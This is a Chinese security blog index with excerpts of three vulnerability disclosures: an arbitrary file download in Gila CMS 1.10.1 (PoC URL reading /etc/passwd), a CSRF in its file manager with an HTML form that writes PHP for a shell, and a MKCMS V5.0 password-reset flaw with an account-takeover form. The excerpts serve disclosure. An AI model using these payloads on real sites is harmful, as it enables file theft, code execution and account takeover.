HelloWorld

博文

Gila CMS 1.10.1 任意文件下载漏洞

四月 24, 2019

一、漏洞摘要漏洞名称: Gila CMS 1.10.1 任意文件下载漏洞上报日期: 2019-04-24 漏洞发现者: topsec_lizhongcheng 产品首页: https://gilacms.com 版本: V1.10.1 二、漏洞概述普通用户在下载文件时没有对路径进行过滤,导致可以下载系统文件，造成信息泄露文件: /src/core/classes/db_backup.php poc: http://192.168.1.112/gila-1.10.1/admin/db_backup?download=/etc/passwd

阅读全文

Gila CMS 1.10.1 CSRF 漏洞

四月 22, 2019

一、漏洞摘要漏洞名称: Gila CMS 1.10.1 CSRF 漏洞上报日期: 2019-04-22 漏洞发现者: topsec_lizhongcheng 产品首页: https://gilacms.com 版本: V1.10.1 二、漏洞概述后台修改文件处没有token验证，导致csrf漏洞的发生，构造对应的exp可导致getshell 文件:/src/core/controllers/fm.php 构造如下代码，保存为html文件并打开，将成功触发漏洞 <html> <body> <script>history.pushState('', '', '/')</script> <form action="http://192.168.3.21/gila-1.10.1/fm/save" method="POST"> <input type="hidden" name="contents" value="<?php
/*!
 * Gila CMS
 * Copyright 2017-19 Vasileios Zoumpourlis
 * Licensed under BSD 3-Clause License
 */
phpinfo();
exit()&#5

阅读全文

MKCMS V5.0存在逻辑漏洞

四月 18, 2019

一、漏洞摘要漏洞名称: MKCMS V5.0存在逻辑漏洞上报日期: 2019-04-18 漏洞发现者: topsec_lizhongcheng 产品首页: https://micool.net/1090.html 软件链接: https://www.lanzous.com/i2ipcre 版本: V5.0 二、漏洞概述 1.找回密码的处理逻辑存在漏洞，导致可以接管任意账号 : ucenter/ repass.php $username 通过post请求过来，接着查询数据库是否存在对应的记录；md5加密后（123456）直接插入数据库，最后通过邮件发送给对应的邮箱账号。所以这里重置后，密码是可知道的，导致可以接管对应账号三、利用代码 1. 构造如下 poc.html, 并访问 poc.html，然后用123456密码登录即可 <html> <body> <script>history.pushState('', '', '/')</script> <form action="http://v.micool.top/ucenter/repass.php" method="POST"> <input type="hidden" name="u_name" value="lduo123" /> <input type="hidden" name="u_email" value="admin@gmail.com" /> <input type="submit" value="Submit request" />

阅读全文

搜索此博客

HelloWorld

博文

OTCMS 反射型XSS漏洞

Gila CMS 1.10.1 任意文件下载漏洞

Gila CMS 1.10.1 CSRF 漏洞

MKCMS V5.0存在逻辑漏洞